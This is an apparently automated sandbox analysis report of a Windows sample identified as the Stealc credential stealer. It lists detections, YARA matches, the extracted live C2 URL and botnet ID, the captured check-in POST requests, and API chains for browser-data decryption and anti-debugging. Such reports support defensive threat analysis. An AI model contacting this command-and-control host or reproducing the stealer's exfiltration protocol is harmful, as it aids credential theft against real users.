Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QmMKz5d4j7.exe

Overview

General Information

Sample name:QmMKz5d4j7.exe
renamed because original name is a hash value
Original sample name:14f08bd33d03c8c7fcc198cb30dc29f6.exe
Analysis ID:1528573
MD5:14f08bd33d03c8c7fcc198cb30dc29f6
SHA1:5f3bc9b11d0d629a8b5be0f0f4ae0ae640d49463
SHA256:79687ef32097ae98d2d577f0d362ffed81fd058212a210a8ffa371d7fc1be4f0
Tags:32exetrojan
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • QmMKz5d4j7.exe (PID: 4228 cmdline: "C:\Users\user\Desktop\QmMKz5d4j7.exe" MD5: 14F08BD33D03C8C7FCC198CB30DC29F6)
    • WerFault.exe (PID: 2148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1128 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2247145227.0000000000691000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x25e9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2247177078.00000000006BD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          0.3.QmMKz5d4j7.exe.2350000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.2.QmMKz5d4j7.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.3.QmMKz5d4j7.exe.2350000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.QmMKz5d4j7.exe.22d0e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.QmMKz5d4j7.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T02:33:57.329692+020020442431Malware Command and Control Activity Detected192.168.2.54970462.122.184.14480TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: QmMKz5d4j7.exeAvira: detected
                    Source: 00000000.00000003.2031101975.0000000002350000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.122.184.144/f88d87a7e087e100.php", "Botnet": "default5_pal"}
                    Source: http://62.122.184.144/Virustotal: Detection: 9%Perma Link
                    Source: http://62.122.184.144/f88d87a7e087e100.phpVirustotal: Detection: 10%Perma Link
                    Source: http://62.122.184.144Virustotal: Detection: 9%Perma Link
                    Source: QmMKz5d4j7.exeReversingLabs: Detection: 28%
                    Source: QmMKz5d4j7.exeVirustotal: Detection: 34%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: QmMKz5d4j7.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DCA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_022DCA87
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022D74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_022D74A7
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022D9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_022D9D27
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022E9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_022E9107
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022D9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_022D9DC7

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeUnpacked PE file: 0.2.QmMKz5d4j7.exe.400000.1.unpack
                    Source: QmMKz5d4j7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022DE697
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022E3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022E3B17
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022E4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022E4B77
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022DEF87
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022E47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022E47D7
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022DE077
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022DDCE7
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DF8F1 FindFirstFileA,0_2_022DF8F1
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022DC0D7
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022D1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022D1937
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022E4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022E4107
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_022DF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022DF917

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.122.184.144:80
                    Source: Malware configuration extractorURLs: http://62.122.184.144/f88d87a7e087e100.php
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.122.184.144Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /f88d87a7e087e100.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGCHost: 62.122.184.144Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 31 37 32 46 32 44 33 38 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 2d 2d 0d 0a Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="hwid"16172F2D389E487256326------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="build"default5_pal------BFHJECAAAFHIJKFIJEGC--
                    Source: Joe Sandbox ViewASN Name: GORSET-ASRU GORSET-ASRU
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.144
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,HeapCreate,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.122.184.144Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownHTTP traffic detected: POST /f88d87a7e087e100.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGCHost: 62.122.184.144Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 31 37 32 46 32 44 33 38 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 2d 2d 0d 0a Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="hwid"16172F2D389E487256326------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="build"default5_pal------BFHJECAAAFHIJKFIJEGC--
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247026062.000000000067E000.00000004.00000020.00020000.00000000.sdmp, QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/9
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php)
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.php5
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, QmMKz5d4j7.exe, 00000000.00000002.2247177078.000000000070A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpU
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/f88d87a7e087e100.phpe
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144/ws
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247026062.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144g
                    Source: QmMKz5d4j7.exe, 00000000.00000002.2247177078.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.122.184.144k
                    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net

                    System Summary

                    barindex
                    Source: 00000000.00000002.2247145227.0000000000691000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1128
                    Source: QmMKz5d4j7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2247145227.0000000000691000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\44ZTFHS9.htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4228
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\75c7f08f-1df9-4479-b707-266b978cd10eJump to behavior
                    Source: QmMKz5d4j7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: QmMKz5d4j7.exeReversingLabs: Detection: 28%
                    Source: QmMKz5d4j7.exeVirustotal: Detection: 34%
                    Source: unknownProcess created: C:\Users\user\Desktop\QmMKz5d4j7.exe "C:\Users\user\Desktop\QmMKz5d4j7.exe"
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1128
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: QmMKz5d4j7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeUnpacked PE file: 0.2.QmMKz5d4j7.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.wagasul:R;.boyeyaw:R;.damupos:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeUnpacked PE file: 0.2.QmMKz5d4j7.exe.400000.1.unpack
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: QmMKz5d4j7.exeStatic PE information: section name: .wagasul
                    Source: QmMKz5d4j7.exeStatic PE information: section name: .boyeyaw
                    Source: QmMKz5d4j7.exeStatic PE information: section name: .damupos
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00694C24 push 7DD07DC0h; iretd 0_2_00694C35
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00697C03 push eax; ret 0_2_00697C12
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_0069411E pushfd ; iretd 0_2_00694121
                    Source: C:\Users\user\Desktop\QmMKz5d4j7.exeCode function: 0_2_00697BF4 push eax; ret 0_2_00697C12
